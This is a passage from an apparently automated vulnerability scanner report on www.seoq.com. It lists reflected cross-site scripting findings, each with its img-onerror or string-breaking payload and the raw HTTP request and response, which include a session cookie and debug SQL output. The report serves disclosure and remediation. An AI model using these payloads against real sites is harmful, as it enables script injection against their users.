$("#tabs").tabs();
});

function fbs_click() {u='http://www.seoq.com/quotient/2011/05/01/28382955f';8adf3a8c684/N';t='facebook_status';window.open('http://www.facebook.com/sharer.php?u='+encodeURIComponent(u)+'&t='+encodeURIComponent(t),'sharer','toolbar=0,status=0,width=626,height=436');return false;}

...[SNIP]...
7.122. http://www.seoq.com/quotient/2011/05/01/2838/N [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/05/01/2838/N

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 36672<img%20src%3da%20onerror%3dalert(1)>78327454c47 was submitted in the REST URL parameter 6. This input was echoed as 36672<img src=a onerror=alert(1)>78327454c47 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /quotient/2011/05/01/2838/N36672<img%20src%3da%20onerror%3dalert(1)>78327454c47 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:55:00 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5; expires=Mon, 09-May-2011 02:55:00 GMT; path=/quotient
Content-Type: text/html; charset=UTF-8
Content-Length: 48054

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>SEO Diagnostics Tool</t
...[SNIP]...
<img src=a onerror=alert(1)>78327454c47" title="SEO Quotient for ">http://www.seoq.com/quotient/2011/05/01/2838/N36672<img src=a onerror=alert(1)>78327454c47ddd</a>
...[SNIP]...
7.123. http://www.seoq.com/quotient/2011/05/01/2838/N [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.seoq.com
Path:   /quotient/2011/05/01/2838/N

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ce991'%3b7b1a3fc7dec was submitted in the REST URL parameter 6. This input was echoed as ce991';7b1a3fc7dec in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /quotient/2011/05/01/2838/Nce991'%3b7b1a3fc7dec HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:57 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 54542


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
<script type="text/javascript">    
$(function() {
$("#tabs").tabs();
});

function fbs_click() {u='http://www.seoq.com/quotient/2011/05/01/2838/Nce991';7b1a3fc7dec';t='facebook_status';window.open('http://www.facebook.com/sharer.php?u='+encodeURIComponent(u)+'&t='+encodeURIComponent(t),'sharer','toolbar=0,status=0,width=626,height=436');return false;}

...[SNIP]...
7.124. http://www.seoq.com/quotient/2011/05/01/2838/N [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/05/01/2838/N

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5a547"><img%20src%3da%20onerror%3dalert(1)>e343fb66cd3 was submitted in the REST URL parameter 6. This input was echoed as 5a547"><img src=a onerror=alert(1)>e343fb66cd3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /quotient/2011/05/01/2838/N5a547"><img%20src%3da%20onerror%3dalert(1)>e343fb66cd3 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:57 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5; expires=Mon, 09-May-2011 02:54:57 GMT; path=/quotient
Content-Type: text/html; charset=UTF-8
Content-Length: 48178

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>SEO Diagnostics Tool</t
...[SNIP]...
<a href="http://www.seoq.com/quotient/2011/05/01/2838/N5a547"><img src=a onerror=alert(1)>e343fb66cd3" title="SEO Quotient for ">
...[SNIP]...
7.125. http://www.seoq.com/quotient/2011/05/01/2839/N [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.seoq.com
Path:   /quotient/2011/05/01/2839/N

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d6378'%3b3ce7bc260b was submitted in the REST URL parameter 5. This input was echoed as d6378';3ce7bc260b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /quotient/2011/05/01/2839d6378'%3b3ce7bc260b/N HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:48 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 54545


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
<script type="text/javascript">    
$(function() {
$("#tabs").tabs();
});

function fbs_click() {u='http://www.seoq.com/quotient/2011/05/01/2839d6378';3ce7bc260b/N';t='facebook_status';window.open('http://www.facebook.com/sharer.php?u='+encodeURIComponent(u)+'&t='+encodeURIComponent(t),'sharer','toolbar=0,status=0,width=626,height=436');return false;}

...[SNIP]...
7.126. http://www.seoq.com/quotient/2011/05/01/2839/N [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/05/01/2839/N

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d53cd"><img%20src%3da%20onerror%3dalert(1)>ac4bf715a48 was submitted in the REST URL parameter 5. This input was echoed as d53cd"><img src=a onerror=alert(1)>ac4bf715a48 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /quotient/2011/05/01/2839d53cd"><img%20src%3da%20onerror%3dalert(1)>ac4bf715a48/N HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:48 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 56035


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
<a href="http://www.seoq.com/quotient/2011/05/01/2839d53cd"><img src=a onerror=alert(1)>ac4bf715a48/N" title="SEO Quotient for ">
...[SNIP]...
7.127. http://www.seoq.com/quotient/2011/05/01/2839/N [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/05/01/2839/N

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload c05b2<img%20src%3da%20onerror%3dalert(1)>194b8082eef was submitted in the REST URL parameter 5. This input was echoed as c05b2<img src=a onerror=alert(1)>194b8082eef in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /quotient/2011/05/01/2839c05b2<img%20src%3da%20onerror%3dalert(1)>194b8082eef/N HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:51 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 55865


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
< 2839c05b2<img src=a onerror=alert(1)>194b8082eef and
site_url LIKE 'N' ORDER BY `report_date` DESC LIMIT 2 </p>
...[SNIP]...
7.128. http://www.seoq.com/quotient/2011/05/01/2839/N [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/05/01/2839/N

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 33d6f"><img%20src%3da%20onerror%3dalert(1)>4b93dd2f611 was submitted in the REST URL parameter 6. This input was echoed as 33d6f"><img src=a onerror=alert(1)>4b93dd2f611 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /quotient/2011/05/01/2839/N33d6f"><img%20src%3da%20onerror%3dalert(1)>4b93dd2f611 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:55:06 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5; expires=Mon, 09-May-2011 02:55:07 GMT; path=/quotient
Content-Type: text/html; charset=UTF-8
Content-Length: 48178

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>SEO Diagnostics Tool</t
...[SNIP]...
<a href="http://www.seoq.com/quotient/2011/05/01/2839/N33d6f"><img src=a onerror=alert(1)>4b93dd2f611" title="SEO Quotient for ">
...[SNIP]...
7.129. http://www.seoq.com/quotient/2011/05/01/2839/N [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.seoq.com
Path:   /quotient/2011/05/01/2839/N

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3f954'%3bec1f05c8dbb was submitted in the REST URL parameter 6. This input was echoed as 3f954';ec1f05c8dbb in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /quotient/2011/05/01/2839/N3f954'%3bec1f05c8dbb HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:55:07 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 54542


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
<script type="text/javascript">    
$(function() {
$("#tabs").tabs();
});

function fbs_click() {u='http://www.seoq.com/quotient/2011/05/01/2839/N3f954';ec1f05c8dbb';t='facebook_status';window.open('http://www.facebook.com/sharer.php?u='+encodeURIComponent(u)+'&t='+encodeURIComponent(t),'sharer','toolbar=0,status=0,width=626,height=436');return false;}

...[SNIP]...
7.130. http://www.seoq.com/quotient/2011/05/01/2839/N [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/05/01/2839/N

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload d73b1<img%20src%3da%20onerror%3dalert(1)>cdb69d84558 was submitted in the REST URL parameter 6. This input was echoed as d73b1<img src=a onerror=alert(1)>cdb69d84558 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /quotient/2011/05/01/2839/Nd73b1<img%20src%3da%20onerror%3dalert(1)>cdb69d84558 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:55:10 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5; expires=Mon, 09-May-2011 02:55:10 GMT; path=/quotient
Content-Type: text/html; charset=UTF-8
Content-Length: 48054

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>SEO Diagnostics Tool</t
...[SNIP]...
<img src=a onerror=alert(1)>cdb69d84558" title="SEO Quotient for ">http://www.seoq.com/quotient/2011/05/01/2839/Nd73b1<img src=a onerror=alert(1)>cdb69d84558ddd</a>
...[SNIP]...
7.131. http://www.seoq.com/quotient/2011/05/01/2840/N [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/05/01/2840/N

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 59bfb<img%20src%3da%20onerror%3dalert(1)>e704d38e1db was submitted in the REST URL parameter 5. This input was echoed as 59bfb<img src=a onerror=alert(1)>e704d38e1db in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /quotient/2011/05/01/284059bfb<img%20src%3da%20onerror%3dalert(1)>e704d38e1db/N HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:37 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 55865


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
< 284059bfb<img src=a onerror=alert(1)>e704d38e1db and
site_url LIKE 'N' ORDER BY `report_date` DESC LIMIT 2 </p>
...[SNIP]...
7.132. http://www.seoq.com/quotient/2011/05/01/2840/N [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.seoq.com
Path:   /quotient/2011/05/01/2840/N

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 72362'%3bc275c5ef75a was submitted in the REST URL parameter 5. This input was echoed as 72362';c275c5ef75a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /quotient/2011/05/01/284072362'%3bc275c5ef75a/N HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:32 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 54591


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
<script type="text/javascript">    
$(function() {
$("#tabs").tabs();
});

function fbs_click() {u='http://www.seoq.com/quotient/2011/05/01/284072362';c275c5ef75a/N';t='facebook_status';window.open('http://www.facebook.com/sharer.php?u='+encodeURIComponent(u)+'&t='+encodeURIComponent(t),'sharer','toolbar=0,status=0,width=626,height=436');return false;}

...[SNIP]...
7.133. http://www.seoq.com/quotient/2011/05/01/2840/N [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/05/01/2840/N

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d076a"><img%20src%3da%20onerror%3dalert(1)>64f6b0d310c was submitted in the REST URL parameter 5. This input was echoed as d076a"><img src=a onerror=alert(1)>64f6b0d310c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /quotient/2011/05/01/2840d076a"><img%20src%3da%20onerror%3dalert(1)>64f6b0d310c/N HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:32 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 56035


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
<a href="http://www.seoq.com/quotient/2011/05/01/2840d076a"><img src=a onerror=alert(1)>64f6b0d310c/N" title="SEO Quotient for ">
...[SNIP]...
7.134. http://www.seoq.com/quotient/2011/05/01/2840/N [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/05/01/2840/N

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload caa13<img%20src%3da%20onerror%3dalert(1)>b022926bb8 was submitted in the REST URL parameter 6. This input was echoed as caa13<img src=a onerror=alert(1)>b022926bb8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /quotient/2011/05/01/2840/Ncaa13<img%20src%3da%20onerror%3dalert(1)>b022926bb8 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:56 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5; expires=Mon, 09-May-2011 02:54:56 GMT; path=/quotient
Content-Type: text/html; charset=UTF-8
Content-Length: 48012

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>SEO Diagnostics Tool</t
...[SNIP]...
<img src=a onerror=alert(1)>b022926bb8" title="SEO Quotient for ">http://www.seoq.com/quotient/2011/05/01/2840/Ncaa13<img src=a onerror=alert(1)>b022926bb8ddd</a>
...[SNIP]...
7.135. http://www.seoq.com/quotient/2011/05/01/2840/N [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.seoq.com
Path:   /quotient/2011/05/01/2840/N

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 42fd0'%3ba1480315da was submitted in the REST URL parameter 6. This input was echoed as 42fd0';a1480315da in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /quotient/2011/05/01/2840/N42fd0'%3ba1480315da HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:53 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 54494


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
<script type="text/javascript">    
$(function() {
$("#tabs").tabs();
});

function fbs_click() {u='http://www.seoq.com/quotient/2011/05/01/2840/N42fd0';a1480315da';t='facebook_status';window.open('http://www.facebook.com/sharer.php?u='+encodeURIComponent(u)+'&t='+encodeURIComponent(t),'sharer','toolbar=0,status=0,width=626,height=436');return false;}

...[SNIP]...
7.136. http://www.seoq.com/quotient/2011/05/01/2840/N [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/05/01/2840/N

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5af28"><img%20src%3da%20onerror%3dalert(1)>658ceb1f789 was submitted in the REST URL parameter 6. This input was echoed as 5af28"><img src=a onerror=alert(1)>658ceb1f789 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /quotient/2011/05/01/2840/N5af28"><img%20src%3da%20onerror%3dalert(1)>658ceb1f789 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:53 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5; expires=Mon, 09-May-2011 02:54:53 GMT; path=/quotient
Content-Type: text/html; charset=UTF-8
Content-Length: 48178

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>SEO Diagnostics Tool</t
...[SNIP]...
<a href="http://www.seoq.com/quotient/2011/05/01/2840/N5af28"><img src=a onerror=alert(1)>658ceb1f789" title="SEO Quotient for ">
...[SNIP]...
7.137. http://www.seoq.com/quotient/2011/05/01/2841/N [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.seoq.com
Path:   /quotient/2011/05/01/2841/N

Issue detail

